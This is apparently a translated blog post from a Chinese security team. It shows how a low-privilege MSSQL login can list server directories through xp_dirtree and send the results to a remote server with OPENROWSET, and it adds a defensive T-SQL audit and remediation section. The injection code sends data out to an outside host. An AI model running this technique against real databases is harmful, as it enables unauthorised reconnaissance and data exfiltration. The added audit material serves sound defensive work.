How to use xp_dirtree through injection with public permission in MSSQL

Author: kj021320
Source: I.S.T.O Technical Team (http://blog.csdn.net/I_S_T_O)

This article has been sitting within the team for a long time. It is only a small part of <Art of SQL Injection>; material for that has been collected for a long time, but it is estimated that it will not be ready by the end of the year, so we are releasing this part first. This is mainly because MSSQL 2005 has arrived and 2K will be phased out soon, so let's share it with everyone. The advertisement is finished...

Body:

Many people may feel depressed when talking about public permissions. I read an article about getting a webshell or system permissions under the public and db_owner permissions in MSSQL (the name is really long -_-!!!). It says there is no way to make use of stored procedures such as xp_regread and xp_dirtree, the reason being that there is no way to create a table under public. Here I will correct that: public can create a table, so these stored procedures can be used effectively. The code is as follows:

-- Create a temporary table. Generally, we cannot create an ordinary table; we can only create a temporary table.
CREATE TABLE #nonamed (
    Dir ntext,
    Num int
)

-- Call the stored procedure and save the returned data to the temporary table
INSERT #nonamed EXECUTE master..xp_dirtree 'C:\', 1

-- Use the OPENROWSET function to export the data in the temporary table to the dirtree table in the local MSSQL.
INSERT INTO OPENROWSET('sqloledb', '192.0.0.1';'user';'pass', 'select * from northwind.dbo.dirtree')
SELECT * FROM #nonamed

With the above method, public can traverse the directories on the server. As for what specific use that has ~ haha
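For administrators, the following T-SQL audits the two preconditions the method above depends on: EXECUTE rights on the extended procedures, and ad hoc OPENROWSET being enabled. It is an added example, not part of the original article or the author's code. It assumes it is run by a sysadmin on the instance under review, and the remediation statements are left commented out.

```sql
-- Added example: read-only audit of the preconditions used above.

-- 1) Who holds EXECUTE on the extended procedures named in the article?
--    A row with grantee = 'public' means every login can call the procedure.
SELECT  o.name        AS procedure_name,
        pr.name       AS grantee,
        p.state_desc  AS permission_state
FROM    master.sys.database_permissions AS p
JOIN    master.sys.all_objects          AS o
        ON o.object_id = p.major_id
JOIN    master.sys.database_principals  AS pr
        ON pr.principal_id = p.grantee_principal_id
WHERE   p.class = 1                               -- object-level permission
  AND   p.type  = 'EX'                            -- EXECUTE
  AND   o.name IN ('xp_dirtree', 'xp_regread')
ORDER BY o.name, pr.name;

-- 2) Is ad hoc OPENROWSET allowed? value_in_use = 1 permits the
--    INSERT INTO OPENROWSET(...) export step; 0 blocks it.
--    On SQL Server 2005 and later this option is off by default.
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name = 'Ad Hoc Distributed Queries';

-- 3) Remediation. Assumption: nothing in this environment relies on
--    public access to xp_dirtree or on ad hoc distributed queries.
--    Confirm that first, then uncomment.
-- USE master;
-- REVOKE EXECUTE ON xp_dirtree FROM public;
-- EXEC sp_configure 'show advanced options', 1;
-- RECONFIGURE;
-- EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
-- RECONFIGURE;
```

Because the export step makes the database server open an outbound connection to a remote SQL Server, egress filtering on the database host also blocks it regardless of these settings.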
